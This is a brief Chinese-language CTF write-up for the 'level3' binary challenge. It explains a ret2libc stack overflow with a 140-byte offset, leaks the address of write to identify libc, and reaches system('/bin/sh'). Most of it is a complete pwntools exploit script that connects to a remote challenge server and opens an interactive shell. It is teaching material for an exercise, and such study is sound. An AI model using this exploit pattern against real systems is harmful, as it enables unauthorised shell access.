checksec level3
./level3

ida，无system无binsh，要通过泄露write函数来泄露libc版本，才能找到system和binsh的地址。
第一次溢出返回到write函数执行write(1,write_got,4)得到write的真实地址，计算得到system跟"/bin/sh"的真实地址，然后再返回到vulnerable_function函数，第二次回到溢出点，覆盖返回地址到system执行system("/bin/sh")

栈溢出

gdb爆偏移为140

脚本为

#-*-coding:utf-8-*-
#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib

context.terminal=['gnome-terminal','-x','sh','-c']
sh = remote("111.198.29.45","39255")
#sh = process('./level3')
elf = ELF('./level3')

write_plt = 0x08048340#write_plt = elf.plt['write']
write_got = 0x0804A018#write_got = elf.got['write']
vuln = 0x0804844B
print "write_plt =",hex(write_plt)
print "vuln =",hex(vuln)

print "leak write_got addr and return to vulnerable function again"
payload = ''
payload += 'A'*140
payload += p32(write_plt)
payload += p32(vuln)
payload += p32(1) + p32(write_got) + p32(4)

#gdb.attach(sh)
sh.sendlineafter(':\n', payload)

print "get the related addr"
write_addr = u32(sh.recv()[0:4])
print "write_addr =",hex(write_addr)
libc = LibcSearcher('write',write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')

binsh_addr = libcbase + libc.dump('str_bin_sh')
print "libcbase =",hex(libcbase)
print "system_addr =",hex(system_addr)
print "binsh_addr =",hex(binsh_addr)

print "getshell"
payload = ''
payload += 'A'*140
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)

sh.sendline(payload)
sh.interactive()

成功